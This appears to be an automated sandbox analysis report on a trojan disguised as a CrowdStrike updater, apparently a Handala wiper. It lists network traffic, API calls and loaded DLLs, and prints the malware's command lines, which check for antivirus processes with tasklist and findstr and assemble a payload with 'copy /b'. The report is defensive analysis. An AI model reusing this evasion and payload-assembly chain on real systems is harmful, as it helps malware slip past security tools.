        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/0
        Source: CrowdStrike.exe, 00000000.00000003.1705313640.0000000002992000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.globalsign.com/repository/06
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
        Source: C:\Users\user\Desktop\CrowdStrike.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5

        Operating System Destruction

        Source: Yara match | File source: 15.2.RegAsm.exe.700000.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 7904, type: MEMORYSTR
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Process Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | File created: C:\Users\user\AppData\Local\Temp\ListOpenedFileDrv_32.sys
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | File deleted: C:\Windows\appcompat\appraiser\AltData
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_0040497C
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_00406ED2
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_004074BB
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Code function: 15_2_00CF8D78
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Code function: 15_2_00CF7148
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Code function: 15_2_00CF7138
        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\564784\Champion.pif 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: String function: 004062A3 appears 58 times
        Source: CrowdStrike.exe | Static PE information: invalid certificate
        Source: CrowdStrike.exe, 00000000.00000000.1686416868.00000000004F4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameCrowdStrike Updater.exe8 vs CrowdStrike.exe
        Source: CrowdStrike.exe, 00000000.00000003.1709951864.000000000077E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs CrowdStrike.exe
        Source: CrowdStrike.exe, 00000000.00000002.1711963746.000000000077E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs CrowdStrike.exe
        Source: CrowdStrike.exe, 00000000.00000003.1696924451.0000000002999000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs CrowdStrike.exe
        Source: CrowdStrike.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: ListOpenedFileDrv_32.sys.15.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: classification engine | Classification label: mal96.troj.evad.winEXE@24/40@4/2
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Code function: 0_2_004024FB CoCreateInstance
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
        Source: C:\Users\user\Desktop\CrowdStrike.exe | File created: C:\Users\user\AppData\Local\Temp\nsy4082.tmp
        Source: CrowdStrike.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\CrowdStrike.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: CrowdStrike.exe | Virustotal: Detection: 20%
        Source: CrowdStrike.exe | ReversingLabs: Detection: 15%
        Source: C:\Users\user\Desktop\CrowdStrike.exe | File read: C:\Users\user\Desktop\CrowdStrike.exe
        Source: unknown | Process created: C:\Users\user\Desktop\CrowdStrike.exe "C:\Users\user\Desktop\CrowdStrike.exe"
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 564784
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "locatedflatrendsoperating" Ukraine
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\L
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\564784\Champion.pif 564784\Champion.pif 564784\L
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Process created: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 564784
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "locatedflatrendsoperating" Ukraine
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\L
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\564784\Champion.pif 564784\Champion.pif 564784\L
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Process created: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: shfolder.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: edputil.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: appresolver.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: bcp47langs.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: slc.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: sppc.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: wsock32.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: winmm.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: wininet.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: userenv.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: napinsp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: pnrpnsp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: wshbth.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: nlaapi.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: winrnr.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\Champion.pif | Section loaded: apphelp.dll
        Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: aclayers.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: mpr.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: sfc.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: sfc_os.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: textshaping.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: textinputframework.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: coreuicomponents.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: coremessaging.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: rasapi32.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: rasman.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: rtutils.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: winhttp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: winnsi.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: secur32.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: schannel.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: mskeyprotect.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: ntasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: ncrypt.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: ncryptsslp.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: msasn1.dll
        Source: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe | Section loaded: gpapi.dll
        Source: C:\Users\user\Desktop\CrowdStrike.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: CrowdStrike.exe | Static file information: File size 6338272 > 1048576
        Source: CrowdStrike.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\naveen\pgms\cpp\openfilefinder_src_vc8\listfiledrv\objfre_wxp_x86\i386\ListOpenedFileDrv.pdb` source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qyC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.00000000007D9000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qiC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qmC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
